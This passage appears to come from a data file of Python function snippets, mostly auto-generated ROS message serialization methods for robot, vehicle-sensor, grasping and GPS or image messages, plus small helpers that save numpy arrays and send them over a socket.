_x.targetNum2, _x.targetNum3, _x.targetNum4, _x.staticpassNum, _x.staticcatchNum))\n _v25 = val1.pos\n _x = _v25\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _v26 = val1.heading\n buff.write(_get_struct_f().pack(_v26.theta))\n buff.write(_get_struct_f().pack(val1.vrot))\n _v27 = val1.vtrans\n _x = _v27\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _x = val1\n buff.write(_get_struct_5Bf().pack(_x.iskick, _x.isvalid, _x.isstuck, _x.isdribble, _x.current_role, _x.role_time))\n _v28 = val1.target\n _x = _v28\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n length = len(self.ballinfo)\n buff.write(_struct_I.pack(length))\n for val1 in self.ballinfo:\n _v29 = val1.header\n buff.write(_get_struct_I().pack(_v29.seq))\n _v30 = _v29.stamp\n _x = _v30\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v29.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_i().pack(val1.ballinfostate))\n _v31 = val1.pos\n _x = _v31\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _v32 = val1.real_pos\n _x = _v32\n buff.write(_get_struct_2f().pack(_x.angle, _x.radius))\n _v33 = val1.velocity\n _x = _v33\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _x = val1\n buff.write(_get_struct_2B().pack(_x.pos_known, _x.velocity_known))\n _x = self\n buff.write(_get_struct_3I().pack(_x.coachinfo.header.seq, _x.coachinfo.header.stamp.secs, _x.coachinfo.header.stamp.nsecs))\n _x = self.coachinfo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3B4f2h3B2I4f4B().pack(_x.coachinfo.MatchMode, _x.coachinfo.MatchType, _x.coachinfo.TestMode, _x.coachinfo.pointA.x, _x.coachinfo.pointA.y, _x.coachinfo.pointB.x, _x.coachinfo.pointB.y, _x.coachinfo.angleA, _x.coachinfo.angleB, _x.coachinfo.idA, _x.coachinfo.idB, _x.coachinfo.kickforce, _x.pass_cmd.pass_id, _x.pass_cmd.catch_id, _x.pass_cmd.pass_pt.x, _x.pass_cmd.pass_pt.y, _x.pass_cmd.catch_pt.x, _x.pass_cmd.catch_pt.y, _x.pass_cmd.is_passout, _x.pass_cmd.is_dynamic_pass, _x.pass_cmd.is_static_pass, _x.pass_cmd.is_valid))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_i3I().pack(_x.messageID, _x.localStamp.header.seq, _x.localStamp.header.stamp.secs, _x.localStamp.header.stamp.nsecs))\n _x = self.localStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.localStamp.time, _x.localStamp.lat, _x.localStamp.lng, _x.localStamp.height))\n buff.write(self.localStamp.position.tostring())\n buff.write(self.localStamp.orientation.tostring())\n buff.write(self.localStamp.linearSpeed.tostring())\n buff.write(self.localStamp.angularSpeed.tostring())\n _x = self\n buff.write(_get_struct_3I().pack(_x.globalStamp.header.seq, _x.globalStamp.header.stamp.secs, _x.globalStamp.header.stamp.nsecs))\n _x = self.globalStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.globalStamp.time, _x.globalStamp.lat, _x.globalStamp.lng, _x.globalStamp.height))\n buff.write(self.globalStamp.position.tostring())\n buff.write(self.globalStamp.orientation.tostring())\n buff.write(self.globalStamp.linearSpeed.tostring())\n buff.write(self.globalStamp.angularSpeed.tostring())\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera.header.seq, _x.camera.header.stamp.secs, _x.camera.header.stamp.nsecs))\n _x = self.camera.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_i3I().pack(_x.camera.messageID, _x.camera.localStamp.header.seq, _x.camera.localStamp.header.stamp.secs, _x.camera.localStamp.header.stamp.nsecs))\n _x = self.camera.localStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.camera.localStamp.time, _x.camera.localStamp.lat, _x.camera.localStamp.lng, _x.camera.localStamp.height))\n buff.write(self.camera.localStamp.position.tostring())\n buff.write(self.camera.localStamp.orientation.tostring())\n buff.write(self.camera.localStamp.linearSpeed.tostring())\n buff.write(self.camera.localStamp.angularSpeed.tostring())\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera.globalStamp.header.seq, _x.camera.globalStamp.header.stamp.secs, _x.camera.globalStamp.header.stamp.nsecs))\n _x = self.camera.globalStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.camera.globalStamp.time, _x.camera.globalStamp.lat, _x.camera.globalStamp.lng, _x.camera.globalStamp.height))\n buff.write(self.camera.globalStamp.position.tostring())\n buff.write(self.camera.globalStamp.orientation.tostring())\n buff.write(self.camera.globalStamp.linearSpeed.tostring())\n buff.write(self.camera.globalStamp.angularSpeed.tostring())\n _x = self\n buff.write(_get_struct_id().pack(_x.camera.camera_numobstacles, _x.camera.VehSpeed))\n for val1 in self.camera_obj:\n _v17 = val1.header\n buff.write(_get_struct_I().pack(_v17.seq))\n _v18 = _v17.stamp\n _x = _v18\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v17.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_i().pack(val1.messageID))\n _v19 = val1.localStamp\n _v20 = _v19.header\n buff.write(_get_struct_I().pack(_v20.seq))\n _v21 = _v20.stamp\n _x = _v21\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v20.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v19\n buff.write(_get_struct_4d().pack(_x.time, _x.lat, _x.lng, _x.height))\n buff.write(_v19.position.tostring())\n buff.write(_v19.orientation.tostring())\n buff.write(_v19.linearSpeed.tostring())\n buff.write(_v19.angularSpeed.tostring())\n _v22 = val1.globalStamp\n _v23 = _v22.header\n buff.write(_get_struct_I().pack(_v23.seq))\n _v24 = _v23.stamp\n _x = _v24\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v23.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v22\n buff.write(_get_struct_4d().pack(_x.time, _x.lat, _x.lng, _x.height))\n buff.write(_v22.position.tostring())\n buff.write(_v22.orientation.tostring())\n buff.write(_v22.linearSpeed.tostring())\n buff.write(_v22.angularSpeed.tostring())\n _x = val1\n buff.write(_get_struct_i2d6i3d3i2d2ididid().pack(_x.camera_obstacle_id, _x.camera_obstacleposx, _x.camera_obstacleposy, _x.blinkerInfo, _x.cut_in_and_out, _x.obstacle_type, _x.obstacle_status, _x.obstacle_valid, _x.obstacles_brake_lights, _x.obstacle_length, _x.obstacle_width, _x.obstacles_velx, _x.obstacleAge, _x.obstacleLane, _x.CIPVFlag, _x.RadarPosX, _x.RadarVelX, _x.RadarMatchConfidence, _x.MatcheRadarID, _x.obstacleAngleRate, _x.obstacles_velY, _x.object_Accel_X, _x.obstacleReplaced, _x.obstacleAngle))\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera_lane.header.seq, _x.camera_lane.header.stamp.secs, _x.camera_lane.header.stamp.nsecs))\n _x = self.camera_lane.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_i3I().pack(_x.camera_lane.messageID, _x.camera_lane.localStamp.header.seq, _x.camera_lane.localStamp.header.stamp.secs, _x.camera_lane.localStamp.header.stamp.nsecs))\n _x = self.camera_lane.localStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.camera_lane.localStamp.time, _x.camera_lane.localStamp.lat, _x.camera_lane.localStamp.lng, _x.camera_lane.localStamp.height))\n buff.write(self.camera_lane.localStamp.position.tostring())\n buff.write(self.camera_lane.localStamp.orientation.tostring())\n buff.write(self.camera_lane.localStamp.linearSpeed.tostring())\n buff.write(self.camera_lane.localStamp.angularSpeed.tostring())\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera_lane.globalStamp.header.seq, _x.camera_lane.globalStamp.header.stamp.secs, _x.camera_lane.globalStamp.header.stamp.nsecs))\n _x = self.camera_lane.globalStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.camera_lane.globalStamp.time, _x.camera_lane.globalStamp.lat, _x.camera_lane.globalStamp.lng, _x.camera_lane.globalStamp.height))\n buff.write(self.camera_lane.globalStamp.position.tostring())\n buff.write(self.camera_lane.globalStamp.orientation.tostring())\n buff.write(self.camera_lane.globalStamp.linearSpeed.tostring())\n buff.write(self.camera_lane.globalStamp.angularSpeed.tostring())\n _x = self\n buff.write(_get_struct_2i3did19i3did21i3did7i3did7i4di().pack(_x.camera_lane.l_numoflaneline, _x.camera_lane.l_lanelineid, _x.camera_lane.l_lanepositon, _x.camera_lane.l_lanecurvature, _x.camera_lane.l_lanecurvaturederivative, _x.camera_lane.l_lane_type, _x.camera_lane.l_heading_angle, _x.camera_lane.l_lane_mark_color, _x.camera_lane.l_laneQuality, _x.camera_lane.l_laneWidthMarking, _x.camera_lane.l_laneViewRangStart, _x.camera_lane.l_laneViewRangEnd, _x.camera_lane.l_laneCrossing, _x.camera_lane.l_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.l_lanePRED_OTHER_SIDE, _x.camera_lane.l_lanePRED_OVERRIDE, _x.camera_lane.l_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.l_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.l_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.l_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.l_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.l_lanePRED_SOURCE_STD, _x.camera_lane.l_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.l_laneTCL, _x.camera_lane.r_numoflaneline, _x.camera_lane.r_lanelineid, _x.camera_lane.r_lanepositon, _x.camera_lane.r_lanecurvature, _x.camera_lane.r_lanecurvaturederivative, _x.camera_lane.r_lane_type, _x.camera_lane.r_heading_angle, _x.camera_lane.r_lane_mark_color, _x.camera_lane.r_laneQuality, _x.camera_lane.r_laneWidthMarking, _x.camera_lane.r_laneViewRangStart, _x.camera_lane.r_laneViewRangEnd, _x.camera_lane.r_laneCrossing, _x.camera_lane.r_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.r_lanePRED_OTHER_SIDE, _x.camera_lane.r_lanePRED_OVERRIDE, _x.camera_lane.r_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.r_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.r_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.r_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.r_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.r_lanePRED_SOURCE_STD, _x.camera_lane.r_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.r_laneTCL, _x.camera_lane.next_l_laneViewRangStart, _x.camera_lane.next_l_laneViewRangEnd, _x.camera_lane.next_l_numoflaneline, _x.camera_lane.next_l_lanelineid, _x.camera_lane.next_l_lanepositon, _x.camera_lane.next_l_lanecurvature, _x.camera_lane.next_l_lanecurvaturederivative, _x.camera_lane.next_l_lane_type, _x.camera_lane.next_l_heading_angle, _x.camera_lane.next_l_lane_mark_color, _x.camera_lane.next_l_laneQuality, _x.camera_lane.next_l_laneWidthMarking, _x.camera_lane.next_r_laneViewRangStart, _x.camera_lane.next_r_laneViewRangEnd, _x.camera_lane.next_r_numoflaneline, _x.camera_lane.next_r_lanelineid, _x.camera_lane.next_r_lanepositon, _x.camera_lane.next_r_lanecurvature, _x.camera_lane.next_r_lanecurvaturederivative, _x.camera_lane.next_r_lane_type, _x.camera_lane.next_r_heading_angle, _x.camera_lane.next_r_lane_mark_color, _x.camera_lane.next_r_laneQuality, _x.camera_lane.next_r_laneWidthMarking, _x.camera_lane.highwayConstructionArea, _x.camera_lane.highwayRoadType, _x.camera_lane.highwayHighwayExitRight, _x.camera_lane.highwayHighwayExitLeft, _x.camera_lane.highwayProbabilityLeftLane, _x.camera_lane.highwayProbabilityRightLane, _x.camera_lane.highwayDriving_peed_left_lane, _x.camera_lane.highwayDriving_peed_right_lane, _x.camera_lane.highwayprotocol_version))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n length = len(self.graspable_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.graspable_objects:\n _x = val1.reference_frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(val1.potential_models)\n buff.write(_struct_I.pack(length))\n for val2 in val1.potential_models:\n _x = val2.model_id\n buff.write(_get_struct_i().pack(_x))\n _v63 = val2.type\n _x = _v63.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v63.db\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _v64 = val2.pose\n _v65 = _v64.header\n _x = _v65.seq\n buff.write(_get_struct_I().pack(_x))\n _v66 = _v65.stamp\n _x = _v66\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v65.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _v67 = _v64.pose\n _v68 = _v67.position\n _x = _v68\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _v69 = _v67.orientation\n _x = _v69\n buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))\n _x = val2.confidence\n buff.write(_get_struct_f().pack(_x))\n _x = val2.detector_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _v70 = val1.cluster\n _v71 = _v70.header\n _x = _v71.seq\n buff.write(_get_struct_I().pack(_x))\n _v72 = _v71.stamp\n _x = _v72\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v71.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(_v70.points)\n buff.write(_struct_I.pack(length))\n for val3 in _v70.points:\n _x = val3\n buff.write(_get_struct_3f().pack(_x.x, _x.y, _x.z))\n length = len(_v70.channels)\n buff.write(_struct_I.pack(length))\n for val3 in _v70.channels:\n _x = val3.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(val3.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(val3.values.tostring())\n _v73 = val1.region\n _v74 = _v73.cloud\n _v75 = _v74.header\n _x = _v75.seq\n buff.write(_get_struct_I().pack(_x))\n _v76 = _v75.stamp\n _x = _v76\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v75.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v74\n buff.write(_get_struct_2I().pack(_x.height, _x.width))\n length = len(_v74.fields)\n buff.write(_struct_I.pack(length))\n for val4 in _v74.fields:\n _x = val4.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = val4\n buff.write(_get_struct_IBI().pack(_x.offset, _x.datatype, _x.count))\n _x = _v74\n buff.write(_get_struct_B2I().pack(_x.is_bigendian, _x.point_step, _x.row_step))\n _x = _v74.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v74.is_dense\n buff.write(_get_struct_B().pack(_x))\n length = len(_v73.mask)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(_v73.mask.tostring())\n _v77 = _v73.image\n _v78 = _v77.header\n _x = _v78.seq\n buff.write(_get_struct_I().pack(_x))\n _v79 = _v78.stamp\n _x = _v79\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v78.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v77\n buff.write(_get_struct_2I().pack(_x.height, _x.width))\n _x = _v77.encoding\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v77\n buff.write(_get_struct_BI().pack(_x.is_bigendian, _x.step))\n _x = _v77.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _v80 = _v73.disparity_image\n _v81 = _v80.header\n _x = _v81.seq\n buff.write(_get_struct_I().pack(_x))\n _v82 = _v81.stamp\n _x = _v82\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v81.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v80\n buff.write(_get_struct_2I().pack(_x.height, _x.width))\n _x = _v80.encoding\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v80\n buff.write(_get_struct_BI().pack(_x.is_bigendian, _x.step))\n _x = _v80.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _v83 = _v73.cam_info\n _v84 = _v83.header\n _x = _v84.seq\n buff.write(_get_struct_I().pack(_x))\n _v85 = _v84.stamp\n _x = _v85\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v84.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = _v83\n buff.write(_get_struct_2I().pack(_x.height, _x.width))\n _x = _v83.distortion_model\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(_v83.D)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(_v83.D.tostring())\n buff.write(_v83.K.tostring())\n buff.write(_v83.R.tostring())\n buff.write(_v83.P.tostring())\n _x = _v83\n buff.write(_get_struct_2I().pack(_x.binning_x, _x.binning_y))\n _v86 = _v83.roi\n _x = _v86\n buff.write(_get_struct_4IB().pack(_x.x_offset, _x.y_offset, _x.height, _x.width, _x.do_rectify))\n _v87 = _v73.roi_box_pose\n _v88 = _v87.header\n _x = _v88.seq\n buff.write(_get_struct_I().pack(_x))\n _v89 = _v88.stamp\n _x = _v89\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v88.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _v90 = _v87.pose\n _v91 = _v90.position\n _x = _v91\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _v92 = _v90.orientation\n _x = _v92\n buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))\n _v93 = _v73.roi_box_dims\n _x = _v93\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _x = val1.collision_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.image.header.seq, _x.image.header.stamp.secs, _x.image.header.stamp.nsecs))\n _x = self.image.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2I().pack(_x.image.height, _x.image.width))\n _x = self.image.encoding\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_BI().pack(_x.image.is_bigendian, _x.image.step))\n _x = self.image.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera_info.header.seq, _x.camera_info.header.stamp.secs, _x.camera_info.header.stamp.nsecs))\n _x = self.camera_info.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2I().pack(_x.camera_info.height, _x.camera_info.width))\n _x = self.camera_info.distortion_model\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(self.camera_info.D)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.camera_info.D.tostring())\n buff.write(self.camera_info.K.tostring())\n buff.write(self.camera_info.R.tostring())\n buff.write(self.camera_info.P.tostring())\n _x = self\n buff.write(_get_struct_6IB().pack(_x.camera_info.binning_x, _x.camera_info.binning_y, _x.camera_info.roi.x_offset, _x.camera_info.roi.y_offset, _x.camera_info.roi.height, _x.camera_info.roi.width, _x.camera_info.roi.do_rectify))\n length = len(self.meshes)\n buff.write(_struct_I.pack(length))\n for val1 in self.meshes:\n length = len(val1.triangles)\n buff.write(_struct_I.pack(length))\n for val2 in val1.triangles:\n buff.write(val2.vertex_indices.tostring())\n length = len(val1.vertices)\n buff.write(_struct_I.pack(length))\n for val2 in val1.vertices:\n _x = val2\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _x = self\n buff.write(_get_struct_7d().pack(_x.reference_to_camera.position.x, _x.reference_to_camera.position.y, _x.reference_to_camera.position.z, _x.reference_to_camera.orientation.x, _x.reference_to_camera.orientation.y, _x.reference_to_camera.orientation.z, _x.reference_to_camera.orientation.w))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _serialize_array(self, array):\n buffer = io.BytesIO()\n np.save(buffer, array)\n return buffer.getvalue()", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_2IQB3I.pack(_x.unique_key, _x.gps_week, _x.gps_millisecond, _x.video_id, _x.image.header.seq, _x.image.header.stamp.secs, _x.image.header.stamp.nsecs))\n _x = self.image.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_d21i7bBI6d13i2I.pack(_x.image.localPose.time, _x.image.localPose.dr_x, _x.image.localPose.dr_y, _x.image.localPose.dr_z, _x.image.localPose.dr_heading, _x.image.localPose.dr_roll, _x.image.localPose.dr_pitch, _x.image.localPose.lf_speed, _x.image.localPose.rf_speed, _x.image.localPose.lr_speed, _x.image.localPose.rr_speed, _x.image.localPose.rot_x, _x.image.localPose.rot_y, _x.image.localPose.rot_z, _x.image.localPose.acc_x, _x.image.localPose.acc_y, _x.image.localPose.acc_z, _x.image.localPose.batteryState, _x.image.localPose.batteryEnergy, _x.image.localPose.steer, _x.image.localPose.brake, _x.image.localPose.fuel, _x.image.localPose.trans, _x.image.localPose.VehicleState, _x.image.localPose.mode, _x.image.localPose.drStatus, _x.image.localPose.errorStatus, _x.image.localPose.emergency_flag, _x.image.localPose.hardswitch_on, _x.image.gpsPos.gps_flag, _x.image.gpsPos.gps_week, _x.image.gpsPos.gps_millisecond, _x.image.gpsPos.longitude, _x.image.gpsPos.laltitude, _x.image.gpsPos.gaussX, _x.image.gpsPos.gaussY, _x.image.gpsPos.height, _x.image.gpsPos.pitch, _x.image.gpsPos.roll, _x.image.gpsPos.azimuth, _x.image.gpsPos.northVelocity, _x.image.gpsPos.eastVelocity, _x.image.gpsPos.upVelocity, _x.image.gpsPos.positionStatus, _x.image.gpsPos.rot_x, _x.image.gpsPos.rot_y, _x.image.gpsPos.rot_z, _x.image.gpsPos.acc_x, _x.image.gpsPos.acc_y, _x.image.gpsPos.acc_z, _x.image.height, _x.image.width))\n _x = self.image.encoding\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_BI.pack(_x.image.is_bigendian, _x.image.step))\n _x = self.image.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def send_ndarray(sock, data):\n with io.BytesIO() as f:\n np.save(f, data)\n byte_data = f.getvalue()\n\n # Pack message length\n msg = struct.pack('>I', len(byte_data)) + byte_data\n sock.sendall(msg)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_2i3I().pack(_x.manip_return_code, _x.object_grabber_return_code, _x.des_gripper_pose.header.seq, _x.des_gripper_pose.header.stamp.secs, _x.des_gripper_pose.header.stamp.nsecs))\n _x = self.des_gripper_pose.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n 